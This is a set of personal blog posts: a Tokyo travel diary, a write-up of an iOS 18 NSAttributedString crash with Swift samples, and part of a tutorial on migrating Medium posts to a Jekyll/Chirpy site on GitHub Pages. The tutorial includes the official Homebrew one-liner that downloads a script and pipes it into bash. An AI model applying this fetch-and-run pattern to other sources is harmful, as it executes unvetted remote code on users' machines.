Therefore, a few days before the trip, we decided to stay overnight at the airport the night before. I found out that there was a capsule hotel at Taoyuan Airport, so we decided to give it a try!
Location: On the south side of Terminal 2, 5th floor, right below Terminal 2 (about a 5-minute walk down)
The rooms available were double rooms, triple rooms, quadruple rooms, and single beds (approximately 16 beds per room).
When we booked, only single beds were available.
1 person NT$1,500
Basically, I unpacked the items I bought in the Kansai region, took out some clothes and essentials, repacked my suitcase, and then set off.
Currently, you can’t check in for the airport express for the next day’s flight, so I had to carry my luggage to Terminal 2.
Sean & Me & James
Upon arriving at Terminal 2, I went straight to the departure hall on the third floor. From there, I found the location to the south side shopping mall observation deck (walk to the right at the end of the hall).
Walk to the end and take the escalator up.
At the top of the escalator, you’ll see the entrance to a Taiwanese-style hotel.
After checking in, you can store your luggage and then go out to eat.
Eating is not allowed in the rooms. Each of us received a tea bag upon check-in, which we could ask the front desk to brew. We sat at the bar counter near the door to drink it. They also provided towels for joining the membership on-site.
Earplugs are available at the entrance for free.
Corridor
The bathroom facilities were new, clean, and comfortable. There were two toilets, five shower rooms, two hairdryers (one Dyson), and shower gel and shampoo provided. Guests need to bring their own towels and toiletries.
Men’s Bathroom
Upon entering, there is a luggage room on the left. The layout of the beds is as follows:
Dormitory Beds
Each bed had its own mirror, desk, lamp, curtain, and trash can. I slept on the top bunk, and the mattress was thick enough that I didn’t disturb the person on the bottom bunk when moving around.
The translation of the Markdown content is as follows:
The mattress is not only thick but also long enough, 176 CM, so sleeping is not a problem; the environment is clean, the lighting is warm, and the air conditioning is very comfortable; the only irresistible factor is that snoring from others can still be heard (so free earplugs are provided at the door).
But I’m not afraid of noise, as long as it’s warm and relaxing, I can sleep well; so I slept until dawn, directly brushing my teeth and checking out at nearly 6 o’clock (slept full and satisfied, then went abroad).
Fortunately, we had a reservation the night before, and when other guests wanted to check in on the spot, there were no more available spots.
In the morning, leisurely enjoy the airport view:
I thought it would be crowded at 8 am in the morning, but luckily there were hardly any people.
If I had known, I would have slept in the capsule hotel until 7 o’clock and then come down!
This time, the boarding gate required taking a shuttle bus (referred to as a shuttle bus by mainland netizens).
It was hot and crowded, but I still made it to the boarding gate:
Bye 🇹🇼
Arrival at Narita Airport
Hey 🇯🇵
It takes about 15 minutes to walk from the plane to the immigration hall, and by the time you actually pick up your luggage and go through customs, it’s already around 1 pm.
When transferring to the Narita Express, I made a mistake at the beginning by swiping my Suica card at the entrance; it turned out that all seats on the Narita Express were reserved, so I had to exit, buy a ticket, and then re-enter the station (later I found out that you can apparently buy tickets directly at the platform machine inside the station).
Later, I took the Narita Express departing at 2 o’clock to Tokyo Station.
Enjoying the scenery along the way, when you can see the Tokyo Skytree, it means you’re almost there.
After arriving at Tokyo Station, I transferred to the subway to Shimbashi Station, then found my way to Shiodome.
The hotel is hidden inside an office building, very unique:
At first, I thought I had walked into someone’s office building by mistake, but it turned out to be the hotel.
Drop off luggage, take a rest: Hotel Villa Fontaine Grand Tokyo Shiodome
(The video was filmed later and is a bit chaotic XD)
You must visit this intersection, reminiscent of the challengers of the border of the afterlife.
Queue up to taste the famous Gokumaru House around 5:30 PM, and after about 45 minutes of waiting, there will be seats available.
I ordered the Kobe beef hamburger + Kobe beef steak + rice ice cream combo ($3,355 Japanese Yen):
The staff helped set the doneness level to about 1 minute, and you have to flip it yourself on the iron plate to cook it to your preferred doneness. Gokumaru House
Here, it is important to use two pairs of chopsticks; for hygiene, use the metal ones for cooking and the bamboo ones for eating, alternating between them.
The Kobe beef steak is delicious, juicy, tender, and has no gamey taste 🤩; the hamburger is also good but a bit heavier.
Accidentally bought some items.
Luckily, Sean bought the tickets early; otherwise, we wouldn’t have been able to get in.
It’s dark up there, a bit windy, and you can’t bring bags (lockers are provided).
Apart from a bar in the corner, there are no other facilities or light pollution, making it great for taking photos and enjoying the night view.
You probably need to make a separate reservation for the bar, and it has the same opening hours as the visit.
The tofu skin instant noodles are delicious.
Early the next morning, rushed to the 10 AM Gundam performance, took a train to Sakuragicho Station, then transferred to a cable car + walked to the Gundam Factory.
The weather is super nice!!
[_KKday Japan Yokohama GUNDAM FACTORY YOKOHAMA & Yokohama Marine Tower Set Ticket_](https://www.kkday.com/zh-tw/product/149471-gundam-factory-yokohama-marine-tower-set-ticket-japan?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
The Gundam performance lasted from 10 AM until noon, with different storylines for different sessions; however, since I’m not a Gundam fan, I just enjoyed the spectacle.
But I have to say it’s very spectacular, the details, movements, and sounds are very delicate.
There are also peripheral specialty stores inside, selling Gundam models and exclusive products.
Sean’s Gundam Finished Product
Because I’m not a Gundam fan, I just walked around, watched a few performances, and then left.
I headed to Odaiba, the tram from Shiodome to Odaiba is cool, along the way you can see the Fuji TV station and the whole view of Odaiba.
Upon arriving at Odaiba, let’s first see the Statue of Liberty in Odaiba.
It is 1/7 of the Statue of Liberty in New York, symbolizing the friendly relationship between Japan and France.
A little further ahead, looking back, you can see the Fuji TV station that has been destroyed many times by Arale in Dr. Slump.
A little further ahead, you can go to the mall to eat takoyaki and Taiwanese fried chicken?
Takoyaki is average, too many octopus pieces make it greasy; the fried chicken is quite special, although it’s labeled as Taiwanese-style, it’s actually Japanese fried chicken (thin, boneless) coated with Taiwanese flour for frying. It’s different from Taiwanese fried chicken, but I still told the staff it’s delicious, and that I’m Taiwanese 🤣.
I originally planned to buy clothes and shoes at the department store in Odaiba, but when I was close, I saw that the subway could go to Shinjuku; so I suddenly turned and headed to Shinjuku.
Started shopping around.
Went to La Lebo to smell the Tokyo-exclusive scent of GAIAC No. 10.
It feels light… woody… can’t really smell it. (But I still bought it on Day 4)
In the end, I only bought clothes, pants, and cosmetics at the department store, and as the weather started to turn gloomy and rainy, I returned to the hotel.
Hot dogs are delicious, and the fruit wine is good!
We set off early, and the weather was overcast and rainy in the morning.
[_KKday Japan Tokyo Disney Resort Tickets Tokyo Disney Resort_](https://www.kkday.com/zh-tw/product/19252?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
We bought tickets for DisneySea, not Disneyland. The beautiful castle is in Disneyland; to enter DisneySea, you need to take the park’s tram.
After entering the park, we started drawing lots for performances or entry, but didn’t win any. In the end, we purchased front-row seats for the evening fireworks show “ Believe! ~Sea of Dreams~ “ (you can also watch it from the outside, the show is in the harbor public area).
As the rain got heavier, we went to a roadside shop to buy Mickey raincoats:
I personally think the quality and material are quite good, and there are cute Mickey or Minnie patterns (deep red) to choose from, and they are not expensive!!
Luckily, it didn’t rain after noon!! I’m not a rain man!!
Bought raincoats and headed straight to “ Toy Story Crazy Game House “:
There were a lot of people, waited for about 100 minutes to get in:
The game involves teams of 2 people (1 person can play with a computer) operating buttons to shoot and score with projection balloons, high fun factor, low excitement, suitable for couples or families.
There is also Mr. Egghead’s interactive theater performance and a small souvenir shop nearby:
Very cute hugging brother doll!!
Next is “ Soaring: Fantastic Flight “, also a popular amusement facility:
After queuing to enter, before the game starts, there will be scenes introducing the adventurer’s story, paintings hanging on the wall are actually high-resolution screens with animations and speech, very impressive!
The theater, ball-shaped giant screen + 4D experience (seats will rise and move forward + air scents); the content is landscapes from around the world, for example, the great plains will have the scent of grass; very stunning, suitable for everyone!
Here we bought the fast pass.
After playing these two facilities, it was close to noon, so we started looking for food. Since the restaurants were full, we could only find snacks like pizza, chicken legs… etc.
Just as we came out with food, the Harbor Show “ Colors of Christmas “ started:
After eating, we started wandering around the souvenir shops in the park:
After digesting, we started queuing for “ Journey to the Center of the Earth “:
It takes about 90-100 minutes, just enough time to fully digest, otherwise it would be too exciting XD
The content is a replica of the movie “Journey to the Center of the Earth”, with impressive scenes and immersion; at the end, there will be acceleration and a slight descent (feeling of weightlessness), the excitement is stronger but not to the point of feeling weak in the legs, suitable for friends looking for a bit of excitement.
After coming out, we went to the nearby “ 20,000 Leagues Under the Sea “ to relax:
Not many people, the content is a simulated feeling of diving in a submarine (but it should be simulated), very low excitement, only suitable for young children.
After sitting down, we continued to wander around and eat:
Very cute but very sweet Mickey ice cream bars, and Anna Belle (Lena Belle).
Continued to walk around and take pictures, the park is really big, just took some scenery shots, didn’t take any pictures of animated fantasy scenes:
After reaching the end, we went to ride “ Indiana Jones Adventure: Temple of the Crystal Skull “:
No deep-sea exploration adventure (no weightlessness and not that fast down), the content is an immersive scene from the movie Indiana Jones, personally I find it interesting and fun.
Continuing to skim through:
Also took the “ Disney Sea Ferry Route “ and “ Disney Sea Electric Railway “ because my feet were sore from walking, and the scenery along the way was nice; more inclined towards the transportation facilities within the park, without any special amusement effects.
As the evening approached, started shopping and taking photos:
Had to admit it was easy to go on a shopping spree because of many 40th-anniversary limited editions; also took photos with the Earth.
Approaching the start time of the performance, started walking back to the harbor and sat on the ground upon entry.
As mentioned earlier, we also purchased regular seats for viewing.
The whole performance experience was very immersive, including music, projections (the volcano will erupt at the back!), lasers, fireworks, Disney Sea-related character plots… all combined very well, definitely worth staying until the end of the evening to watch the performance.
After experiencing the whole day at Disney, my impression is that all the facilities are very immersive, not just simple amusement facilities, but aiming for visitors to immerse themselves in that character and scene; although not as thrilling as Universal, I find it very entertaining; the fireworks show at night is a must-see!
There are many cute souvenirs, need to control your hands (stop shopping)!
Ate random food, think it’s better to bring your own food from outside.
If time allows, it’s better to spend two days on land and sea, the sea part lacks the dreamy castle and the parade on land QQ
Outside JR Maihama Station, there is still a last peripheral specialty store to shop at, took one last stroll before leaving reluctantly.
After returning to the hotel, continued with the daily routine; today had soy sauce ramen, cantaloupe fruit juice (delicious!!), Akaya plum wine (delicious!!), and oolong shochu (tasteless, not good).
After a good night’s sleep, started thinking about today’s itinerary (crazy ENFP), the only thing everyone did together was Tokyo Skytree at night; in the morning, friends went to Akihabara, it was a day to explore Tokyo alone.
Looking at the map, Shinbashi is not far from Tokyo Tower; decided to go there first.
Upon leaving, found out that there was a serious subway accident causing delays, so decided to walk instead (about 20 minutes):
Walking alone on the streets of Tokyo, it’s not too hot in June, enjoying the breeze.
Encountered a vendor selling hot roasted sweet potatoes on the roadside.
When approaching Tokyo Tower, passed by a park called “Tokyo Metropolitan Shiba Park” and viewing the tower through the branches from here offers a unique perspective:
Continuing down the mountain road, arrived at the base of Tokyo Tower.
[_KKday Japan Tokyo Tokyo Tower Main Observatory Tokyo Tower E-Ticket_](https://www.kkday.com/zh-tw/product/12271-japan-tokyo-tower-observatory-e-ticket?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
Upon entering the tower, purchased Top Deck tickets; besides being able to go up to the top of the tower, the ticket includes a guided tour (with Chinese audio) and a complimentary souvenir photo of the visit! (Great experience)
The guided tour features interactive murals similar to those at Disneyland yesterday 😆, with two predecessors in conversation, discussing the construction of a iconic Japanese building, with the same architect having another work being the Tsutenkaku in Osaka.
The morning view of Tokyo from above is nice, with the third image showing the Skytree to visit at night.
Finally, a free commemorative photo of the successful tower climb!
After visiting Tokyo Tower, checked the map and decided to head to Meiji Shrine.
After getting off the subway, walked a long way (about 30 minutes) to reach Meiji Shrine.
A special encounter was witnessing a traditional Japanese wedding ceremony happening at the shrine:
Finished the visit at the main hall and left.
Found Meiji Shrine to be more solemn and serious, while Asakusa Temple felt crowded with tourists.
Next stop was the iconic Kameari - Kameari Park, where I wanted to see how it looks; on the way there, stopped by Le Labo in Omotesando for another sniff.
Honestly, I’m not that interested in Le Labo; I prefer Ormonde Jayne perfumes personally, and Le Labo gives me a mass-market packaging vibe.
After a sniff, bought Another 13, a strong scent; and inevitably, also bought the Tokyo-exclusive Gaiac 10, both in 15ml as souvenirs.
Le Labo perfumes are packaged and labeled on-site (takes about 15–20 minutes), allowing customization of your own label; I chose “ZhgChgLi” for 13, my personal favorite, and 10 represents Tokyo, asking the staff in broken English which one represents Japan, and he said ♨️ 😝.
The prices for Le Labo in Japan are as shown, with an additional discount for tax exemption on 13.
The Tokyo-exclusive Gaiac 10 is more expensive, costing $16,800 Japanese Yen after tax exemption.
After shopping, continue to walk towards Kameari (Kameari is really far).
As soon as you exit the station, there are statues of characters from the Ueno Police Station:
Checked the map and went to Kameari Park near the back station for a stroll:
It’s just an ordinary park, with many children playing soccer inside. There is a statue in a sitting position, covered with children’s belongings, so I didn’t take any photos.
Checked online and found that there is a scene of the Ueno Police Station at the Ario department store nearby, so I continued walking (about 10 minutes):
Upon entering, I was disappointed. It’s almost certain that the popularity of Ueno has declined (young people don’t watch it anymore…). Apart from the statues at the station exit, from the ordinary park in front to the so-called Ueno Police Station amusement park, only the set is left, and outside the set, it has been transformed into a playground (with claw machines).
The saddest part was the gachapon machine at the entrance, with the eyes of the character broken and not repaired, giving a desolate feeling. In the end, I got a detective in hot pants from the machine and left feeling disappointed.
Checked the map and took a bus to Asakusa, which is closer. It took about 15 minutes to check the route and walk to the bus stop:
There were hardly any people or tourists on the way to the bus stop, and even Google Translate couldn’t translate the bus route; I had truly arrived in a non-touristy area.
I made a mistake when boarding the bus because in Kyoto, you pay when you get off, so I stood there blankly after boarding the bus, not understanding Japanese. It wasn’t until a kind Japanese passenger said “pay pay” that I realized I had to swipe my card to pay at the front.
The journey was quiet and comfortable, with Japanese drivers waiting for passengers to sit down and get up before starting the bus. We swayed all the way to Senso-ji Temple in Asakusa.
KKday Tokyo Kimono Rental Recommendation! Tokyo Asakusa Kimono Experience
There were so many tourists!! It was so crowded that I could only find angles to take photos.
Continued walking towards Senso-ji Temple, there were just too many tourists. I didn’t plan to buy anything, just wanted to take a look around. Along the way, I found this bean shop unexpectedly delicious, so I bought some as souvenirs.
After visiting Senso-ji Temple, there were still many people, so we took some photos and left.
As it was getting close to evening, we started moving towards the Tokyo Skytree.
Senso-ji Temple overlooking the Tokyo Skytree.
Since it was still early, we continued to enjoy the scenery along the way.
Getting closer, it kept getting bigger.
After arriving at the Tokyo Skytree, we first strolled around the shopping mall inside, ordered a cup of Hokkaido strawberry ice cream to take a break.
We didn’t buy tickets for the Top Deck at the Tokyo Skytree, only for the middle observation deck, entering at 7 p.m.
When we first went up, it wasn’t dark yet, so we took a few casual photos:
After sunset, we could overlook the entire night view of Tokyo, which was very beautiful.
In the top left corner of the first picture is the distant Tokyo Tower; it was quite dark inside, and the glass reflected light making it difficult to take selfies.
Managed to take one picture XD
Before leaving, we took one last look back.
On the last night, we ate at an izakaya and took some photos of the night views along the way:
Charcoal-grilled Chicken
Japan’s weather turned bad today. It was unexpected to see the Tokyo Tower every day passing by Shiodome, along with special art installations. We finally stopped to appreciate it on the last day.
Still, Nissin noodles are delicious, especially with convenience store fried chicken 🤤! Bought melon juice a few days ago, and today bought strawberry juice, both were delicious; can’t remember the sake, so they were probably average.
After waking up and storing our luggage, like Day 4, I casually explored Tokyo because my flight was in the evening, so I had most of the day to wander around, but the weather was gloomy and rainy.
Remembering seeing a gachapon machine at the Tokyo Skytree yesterday with Japanese representative landmarks, I hadn’t seen the National Diet Building, so I headed in that direction.
One interesting thing was encountering a protest by Japanese extremists on the way.
Driving a promotional vehicle near the Parliament House, loudly broadcasting, was stopped by the police who removed his loudspeaker; later, he accelerated through a red light to escape, with police everywhere, a bit scary.
Passed by the Parliament House and saw the closed gate, so didn’t go in (seems like you can enter from the side gate for a visit?):
Took a distant photo as a souvenir and then continued walking towards the Imperial Palace.
The Imperial Palace is really big; it took about 30 minutes just to walk from the outer entrance.
After reaching the Tenshukaku, left as the Imperial Palace was not open for visitors that day.
Took about another hour to walk back to Tokyo Station (could have taken the subway, but it’s only one or two stops; I like to walk around the streets and see the scenery).
Around noon, wandered around Tokyo Station; just to prove that I wouldn’t get lost, but too lazy to line up at the famous souvenir shops.
Had tempura soba noodles for the last meal.
Bought a large and a small bottle of sake from a liquor store to take back to Taiwan; the store clerk was also Taiwanese.
Around 4 PM, went back to the hotel to pick up luggage and slowly made my way to Narita Airport.
A glimpse of Shinbashi before leaving.
Returned directly to Narita Airport from Shinbashi because of the schedule and plenty of time; took the Toei Asakusa Line Airport Express, which takes about 1 hour and 15 minutes to arrive; couldn’t use a card or Sucia to buy tickets, so at that moment, pooled together the ticket money for three people, almost couldn’t afford it.
Arrived at the airport around 5:30, still early.
After going through immigration, still had plenty of time, so grabbed a bite to eat and did some last-minute shopping at the duty-free shop.
Found everything from Tanjirō to common souvenirs (Shiroi Koibito, banana cake, etc.) here, so just bought them here XD
The price of Tanjirō here is about the same as what I bought at Tokyo Station.
Boarded the plane, Hey 🇹🇼:
The weather in Japan was very bad, the flight was shaky (fish-eye effect), more thrilling than Disney’s rides, even had to stop dining at one point; luckily, safely arrived back in Taiwan.
The customs clearance took about 12 minutes, and taking a taxi back to Taipei took about 1:30; taking a shower and going straight to bed, ending this journey.
The brainwashing song that kept playing after returning to Taiwan.
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Starting from iOS ≥ 18, merging NSAttributedString attributes Range will reference Equatable
Photo by C M
After the launch of iOS 18 on September 17, 2024, a developer reported a crash when parsing HTML in the open-source project ZMarkupParser.
Seeing this issue was a bit confusing because the program had no issues before, and the crash only occurred with iOS 18, which is illogical. It should be due to some adjustments in the underlying Foundation of iOS 18.
After tracing the code, the crash issue was pinpointed to occur when iterating over .breaklinePlaceholder
Attributes and deleting Range:
1
+2
+3
+4
+5
+6
+
mutableAttributedString.enumerateAttribute(.breaklinePlaceholder, in: NSMakeRange(0, NSMakeRange(0, mutableAttributedString.string.utf16.count))) { value, range, _ in
+ // ...if condition...
+ // mutableAttributedString.deleteCharacters(in: preRange)
+ // ...if condition...
+ // mutableAttributedString.deleteCharacters(in: range)
+}
+
.breaklinePlaceholder
is a custom NSAttributedString.Key I extended to mark HTML tag information for optimizing the use of line break symbols:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
struct BreaklinePlaceholder: OptionSet {
+ let rawValue: Int
+
+ static let tagBoundaryPrefix = BreaklinePlaceholder(rawValue: 1)
+ static let tagBoundarySuffix = BreaklinePlaceholder(rawValue: 2)
+ static let breaklineTag = BreaklinePlaceholder(rawValue: 3)
+}
+
+extension NSAttributedString.Key {
+ static let breaklinePlaceholder: NSAttributedString.Key = .init("breaklinePlaceholder")
+}
+
But the core issue is not here, because before iOS 17, there was no problem with the input
mutableAttributedString
when performing the above operations; indicating that the input data content has changed in iOS 18.
Before delving into the problem, let’s first introduce the merging mechanism of NSAttributedString attributes.
NSAttributedString attributes will automatically compare adjacent Range Attributes objects with the same .key to see if they are the same, and if so, merge them into the same Attribute. For example:
1
+2
+3
+4
+5
+
let mutableAttributedString = NSMutableAttributedString(string: "", attributes: nil)
+mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
+mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
+mutableAttributedString.append(NSAttributedString(string: "<p>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
+mutableAttributedString.append(NSAttributedString(string: "Test", attributes: [.font: UIFont.systemFont(ofSize: 12)]))
+
Final Merged Attributes:
1
+2
+3
+4
+5
+
<div><div><p>{
+ NSFont = "<UICTFont: 0x101d13400> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 14.00pt";
+}Test{
+ NSFont = "<UICTFont: 0x101d13860> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 12.00pt";
+}
+
When enumerating enumerateAttribute(.breaklinePlaceholder...)
, the following results will be obtained:
1
+2
+
NSRange {0, 13}: <UICTFont: 0x101d13400> font-family: ".SFUI-Regular"; font-weight: normal; font-style: normal; font-size: 14.00pt
+NSRange {13, 4}: <UICTFont: 0x101d13860> font-family: ".SFUI-Regular"; font-weight: normal; font-style: normal; font-size: 12.00pt
+
It is speculated that the underlying implementation uses Set<Hashable>
as the Attributes container, automatically excluding the same Attribute objects.
However, for convenience of use, the NSAttributedString attributes: [NSAttributedString.Key: Any?]
Value objects are declared as Any?
Type, without restricting Hashable.
Therefore, it is speculated that the system will conform to as? Hashable
at the underlying level and then use Set to merge and manage objects.
The difference in adjustment for iOS ≥ 18 is speculated to be the underlying implementation issue here.
The following is an example using our custom .breaklinePlaceholder
Attributes:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
struct BreaklinePlaceholder: Equatable {
+ let rawValue: Int
+
+ static let tagBoundaryPrefix = BreaklinePlaceholder(rawValue: 1)
+ static let tagBoundarySuffix = BreaklinePlaceholder(rawValue: 2)
+ static let breaklineTag = BreaklinePlaceholder(rawValue: 3)
+}
+
+extension NSAttributedString.Key {
+ static let breaklinePlaceholder: NSAttributedString.Key = .init("breaklinePlaceholder")
+}
+
+//
+
+let mutableAttributedString = NSMutableAttributedString(string: "", attributes: nil)
+mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.breaklinePlaceholder: NSAttributedString.Key.BreaklinePlaceholder.tagBoundaryPrefix]))
+mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.breaklinePlaceholder: NSAttributedString.Key.BreaklinePlaceholder.tagBoundaryPrefix]))
+mutableAttributedString.append(NSAttributedString(string: "<p>", attributes: [.breaklinePlaceholder: NSAttributedString.Key.BreaklinePlaceholder.tagBoundaryPrefix]))
+mutableAttributedString.append(NSAttributedString(string: "Test", attributes: nil))
+
1
+2
+3
+4
+5
+6
+7
+8
+
<div>{
+ breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
+}<div>{
+ breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
+}<p>{
+ breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
+}Test{
+}
+
1
+2
+3
+4
+
<div><div><p>{
+ breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
+}Test{
+}
+
The same program can have different results on different versions of iOS, which ultimately leads to unexpected crashes in the subsequent
enumerateAttribute(.breaklinePlaceholder..)
due to the handling logic.
Comparison of results with and without implementing Equatable/Hashable in iOS 17/18
⭐️⭐️ iOS ≥ 18 will reference
Equatable
more, while iOS ≤ 17 will not. ⭐️⭐️
Combining the above, the NSAttributedString attributes: [NSAttributedString.Key: Any?]
Value object is declared as Any?
Type, based on observations, iOS ≥ 18 will first reference Equatable
to determine equality, and then use Hashable
Set to merge and manage objects.
When merging Range Attributes with NSAttributedString attributes: [NSAttributedString.Key: Any?], iOS ≥ 18 will reference Equatable more, which is different from before.
Additionally, starting from iOS 18, if only Equatable
is declared, XCode Console will also output a Warning:
Obj-C ` -hash` invoked on a Swift value of type `BreaklinePlaceholder` that is Equatable but not Hashable; this can lead to severe performance problems.
For any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Migrating Medium content to Github Pages (with Jekyll/Chirpy)
In the fourth year of running Medium, I have accumulated over 65 articles, nearly 1000+ hours of effort; the reason I chose Medium initially was its simplicity and convenience, allowing me to focus on writing without worrying about other things. Before that, I had tried self-hosting Wordpress, but I spent all my time on setting up the environment, styles, and plugins, never feeling satisfied with the adjustments. After setting it up, I found it loaded too slowly, the reading experience was poor, and the backend writing interface was not user-friendly, so I stopped updating it.
As I wrote more articles on Medium and accumulated some traffic and followers, I started wanting to control these achievements myself, rather than being controlled by a third-party platform (e.g Medium shutting down and losing all my work). So, I began looking for a second backup website two years ago. I continued to run Medium but also synchronized the content to a website I could control. The solution I found at the time was — Google Site, but honestly, it could only be used as a personal “portal site.” The article writing interface was limited in functionality, and I couldn’t really transfer all my work there.
In the end, I returned to self-hosting, but this time using a static website instead of a dynamic one (e.g. Wordpress). Static websites support fewer features, but all I needed was a writing function and a clean, smooth, customizable browsing experience, nothing else!
The workflow for a static website is: write the article locally in Markdown format, then convert it to a static webpage using a static site engine and upload it to the server, and it’s done. Static webpages provide a fast browsing experience!
Writing in Markdown format allows the article to be compatible with more platforms. If you’re not used to it, you can find online or offline Markdown writing tools, and the experience is just like writing directly on Medium!
In summary, this solution meets my needs for a smooth browsing experience and a convenient writing interface.
Here, I will use my environment as an example. For other operating system versions, please Google how to install Ruby.
1
+
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
+
Enter the above command in Terminal to install Brew.
1
+
brew install rbenv ruby-build
+
Although MacOS comes with Ruby, it is recommended to use rbenv to install another Ruby to separate it from the system’s built-in version. Enter the above command in Terminal to install rbenv.
1
+
rbenv init
+
Enter the above command in Terminal to initialize rbenv.
Enter rbenv
in Terminal to check if the installation was successful!
Success!
1
+
rbenv install 2.6.5
+
Enter the above command in Terminal to install Ruby version 2.6.5.
1
+
rbenv global 2.6.5
+
Enter the above command in Terminal to switch the Ruby version used by Terminal from the system’s built-in version to the rbenv version.
Enter rbenv versions
in Terminal to check the current settings:
Enter ruby -v
in Terminal to check the current Ruby version, and gem -v
to check the current RubyGems status:
*After installing Ruby, RubyGems should also be installed.
Success!
1
+
gem install jekyll bundler ZMediumToMarkdown
+
Enter the above command in Terminal to install Jekyll & Bundler & ZMediumToMarkdown.
Done!
The default Jekyll Blog style is very simple. We can find and apply our favorite styles from the following websites:
The installation method generally uses gem-based themes, some repos provide a Fork method for installation, and some even offer a one-click installation method. In short, the installation method may vary for each template, so please refer to the template’s tutorial for usage.
Additionally, note that since we are deploying to Github Pages, according to the official documentation, not all templates are applicable.
Here, I will use the template Chirpy as an example, which I adopted for my Blog. This template provides the simplest one-click installation method and can be used directly.
Other templates rarely offer similar one-click installation. If you are not familiar with Jekyll or GitHub Pages, using this template is a better way to get started. I will update the article with other template installation methods in the future.
Additionally, you can find templates on GitHub that can be directly forked (e.g., al-folio) and used directly. If not, you will need to manually install the template and research how to set up GitHub Pages deployment. I tried this briefly but was not successful. I will update the article with my findings in the future.
https://github.com/cotes2020/chirpy-starter/generate
GithubUsername/OrganizationName.github.io
(Make sure to use this format)Click “Create repository from template”
Complete the Repo creation.
1
+
git clone git@github.com:zhgchgli0718/zhgchgli0718.github.io.git
+
Git clone the newly created Repo.
Run bundle
to install dependencies:
Run bundle lock — add-platform x86_64-linux
to lock the version
Open the _config.yml
configuration file to set up:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+
# The Site Configuration
+
+# Import the theme
+theme: jekyll-theme-chirpy
+
+# Change the following value to '/PROJECT_NAME' ONLY IF your site type is GitHub Pages Project sites
+# and doesn't have a custom domain.
+# baseurl: ''
+
+# The language of the webpage › http://www.lingoes.net/en/translator/langcode.htm
+# If it has the same name as one of the files in folder `_data/locales`, the layout language will also be changed,
+# otherwise, the layout language will use the default value of 'en'.
+lang: en
+
+# Additional parameters for datetime localization, optional. › https://github.com/iamkun/dayjs/tree/dev/src/locale
+prefer_datetime_locale:
+
+# Change to your timezone › http://www.timezoneconverter.com/cgi-bin/findzone/findzone
+timezone:
+
+# jekyll-seo-tag settings › https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
+# ↓ --------------------------
+
+title: ZhgChgLi # the main title
+
+tagline: Live a life you will remember. # it will display as the sub-title
+
+description: >- # used by seo meta and the atom feed
+ ZhgChgLi iOS Developer eager to learn, teaching and learning from each other, loves movies/TV shows/music/sports/life
+
+# fill in the protocol & hostname for your site, e.g., 'https://username.github.io'
+url: 'https://zhgchg.li'
+
+github:
+ username: ZhgChgLi # change to your github username
+
+twitter:
+ username: zhgchgli # change to your twitter username
+
+social:
+ # Change to your full name.
+ # It will be displayed as the default author of the posts and the copyright owner in the Footer
+ name: ZhgChgLi
+ email: zhgchgli@gmail.com # change to your email address
+ links:
+ - https://medium.com/@zhgchgli
+ - https://github.com/ZhgChgLi
+ - https://www.linkedin.com/in/zhgchgli
+
+google_site_verification: # fill in to your verification string
+
+# ↑ --------------------------
+# The end of `jekyll-seo-tag` settings
+
+google_analytics:
+ id: G-6WZJENT8WR # fill in your Google Analytics ID
+ # Google Analytics pageviews report settings
+ pv:
+ proxy_endpoint: # fill in the Google Analytics superProxy endpoint of Google App Engine
+ cache_path: # the local PV cache data, friendly to visitors from GFW region
+
+# Prefer color scheme setting.
+#
+# Note: Keep empty will follow the system prefer color by default,
+# and there will be a toggle to switch the theme between dark and light
+# on the bottom left of the sidebar.
+#
+# Available options:
+#
+# light - Use the light color scheme
+# dark - Use the dark color scheme
+#
+theme_mode: # [light|dark]
+
+# The CDN endpoint for images.
+# Notice that once it is assigned, the CDN url
+# will be added to all image (site avatar & posts' images) paths starting with '/'
+#
+# e.g. 'https://cdn.com'
+img_cdn:
+
+# the avatar on sidebar, support local or CORS resources
+avatar: '/assets/images/zhgchgli.jpg'
+
+# boolean type, the global switch for ToC in posts.
+toc: true
+
+comments:
